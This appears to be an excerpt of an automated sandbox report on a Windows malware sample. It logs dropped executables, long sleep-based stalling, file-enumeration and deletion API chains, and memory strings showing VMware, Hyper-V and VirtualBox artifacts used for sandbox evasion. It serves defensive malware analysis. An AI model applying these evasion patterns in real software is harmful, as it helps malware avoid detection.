            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winysum.exe
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xjjalq.exe
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winbwxmuq.exe
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7288 - Thread sleep count: 339 > 30
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7288 - Thread sleep time: -173568s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7304 - Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7316 - Thread sleep time: -62320s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7312 - Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7332 - Thread sleep time: -300000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7312 - Thread sleep time: -1080000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7320 - Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7440 - Thread sleep time: -540000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7440 - Thread sleep time: -91000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7448 - Thread sleep time: -260000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7448 - Thread sleep time: -6840000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7312 - Thread sleep time: -1800000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7316 - Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7300 - Thread sleep time: -174080s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7444 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7308 - Thread sleep time: -900000s >= -30000s
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7288 - Thread sleep count: 7218 > 30
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe TID: 7288 - Thread sleep time: -3695616s >= -30000s
            Source: C:\Windows\System32\sihost.exe TID: 8092 - Thread sleep time: -32000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 5832 - Thread sleep time: -18060000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7192 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6660 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 4504 - Thread sleep count: 1801 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 4504 - Thread sleep time: -18010000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 4460 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1368 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6384 - Thread sleep count: 1775 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6384 - Thread sleep time: -17750000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3800 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 4296 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2664 - Thread sleep count: 1772 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2664 - Thread sleep time: -17720000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7112 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 5660 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6392 - Thread sleep count: 1741 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6392 - Thread sleep time: -17410000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2712 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2704 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3216 - Thread sleep count: 1722 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3216 - Thread sleep time: -17220000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6572 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 2052 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7224 - Thread sleep count: 391 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7224 - Thread sleep time: -3910000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 5976 - Thread sleep time: -300000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 8100 - Thread sleep time: -64432s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7912 - Thread sleep time: -180000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7912 - Thread sleep time: -360000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7904 - Thread sleep time: -30720s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 5844 - Thread sleep time: -100000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7824 - Thread sleep time: -7560000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7824 - Thread sleep time: -200000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7912 - Thread sleep time: -3600000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6332 - Thread sleep time: -184320s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6956 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7196 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7360 - Thread sleep count: 1700 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7360 - Thread sleep time: -17000000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1660 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1652 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7264 - Thread sleep count: 1665 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7264 - Thread sleep time: -16650000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7420 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 336 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1912 - Thread sleep count: 1667 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1912 - Thread sleep time: -16670000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 6024 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1920 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 576 - Thread sleep count: 1655 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 576 - Thread sleep time: -16550000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1916 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 744 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3088 - Thread sleep count: 1663 > 30
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 3088 - Thread sleep time: -16630000s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 1056 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe TID: 7496 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\dllhost.exe - File opened: PhysicalDrive0
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Code function: 0_2_01291060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,0_2_01291060
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Code function: 0_2_0128A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,0_2_0128A2F5
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 120000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 62320
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 180000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 300000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 120000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 360000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 1800000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe - Thread delayed: delay time: 900000
            Source: SearchApp.exe, 0000000F.00000000.1602171177.000001F4AE805000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: dx0ma3d6fxrucbibtqempqemuae&or=w
            Source: SearchApp.exe, 0000000F.00000000.1578753735.000001F49DA00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1548558887.000001EC9A57D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1549685571.000001F49A708000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1598831598.000001F4AE68C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1585596585.000001F49DD9C000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"751E9D17E4CD42EBAA6AE59A6ED5C22A","ConversationId":"5eff9dee-03ff-465e-bf2b-c48d3d202d68","LogicalId":"33366b5b-54ef-48bf-819d-677748eae9e3","tid":"651e6ab87a454702b15a8b0357a081d8","sid":"0017FC1997EE65330FCEEFB896C06426","uid":"","muid":"A92BA4E78D2946A0AFDA5029FA43D7A8","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651e6ab87a454702b15a8b0357a081d8 Ref B: MWHEEEAP0024FD7 Ref C: 
2023-10-05T07:50:16Z","vs":{"BAW10":"BFBLCLAZYCF","BAW11":"MSBSSVLMCF","BAW5":"MSBCUSTNONALL","BAW7":"BFBPROWSBINITT1","BAW9":"BCEPREC","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBCREFINER":"1","FEATURE.BFBLCLAZYCF":"1","FEATURE.BFBPROWSBINIT":"1","FEATURE.BFBPROWSBINITT1":"1","FEATURE.BFBWSBCM0921CF":"1","FEATURE.MSBCUSTNONALL":"1","FEATURE.MSBSSVLMCF":"1","FEATURE.MSNSBC2":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.04.39971431"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
            Source: explorer.exe, 0000000A.00000002.2634147825.0000000000C74000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
            Source: SearchApp.exe, 0000000F.00000000.1548558887.000001EC9A56A000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: /rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: (@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;n
            Source: SearchApp.exe, 0000000F.00000000.1568102860.000001F49C520000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: hyper-v
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: dwm.exe, 00000005.00000000.1392615637.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: dRomNECVMWarVMware_SATA_
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429306447.000001D959F25000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1429612710.000001D959FA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB1E9000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000002.2439977862.00000151AB221000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000014.00000000.1725623800.00000151AB221000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
            Source: SearchApp.exe, 0000000F.00000000.1578437841.000001F49D9E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: PfBjDhHzvV.exe, 00000000.00000002.2233613643.000000000009C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\HARDWARE\ACPI\DSDT\VBOX__em000
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
            Source: SearchApp.exe, 0000000F.00000000.1568102860.000001F49C520000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-vOs and f
            Source: SearchApp.exe, 0000000F.00000000.1602171177.000001F4AE805000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wesan
            Source: dwm.exe, 00000005.00000000.1392615637.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: SearchApp.exe, 0000000F.00000000.1600252821.000001F4AE777000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wNone
            Source: explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
            Source: explorer.exe, 0000000A.00000003.2275899145.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: SearchApp.exe, 0000000F.00000000.1560988533.000001F49B2D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lhttps://www.bing.com/AS/API/WindowsCortanaPane/V2/InitFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RuntimeBroker.exe, 00000013.00000000.1717523731.0000016213A57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
            Source: SearchApp.exe, 0000000F.00000000.1560988533.000001F49B2D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: SearchApp.exe, 0000000F.00000000.1571058542.000001F49D60D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1577540067.000001F49D980000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1548678406.000001EC9A5C0000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1567010034.000001F49BDBF000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560988533.000001F49B2D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: dwm.exe, 00000005.00000000.1392615637.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
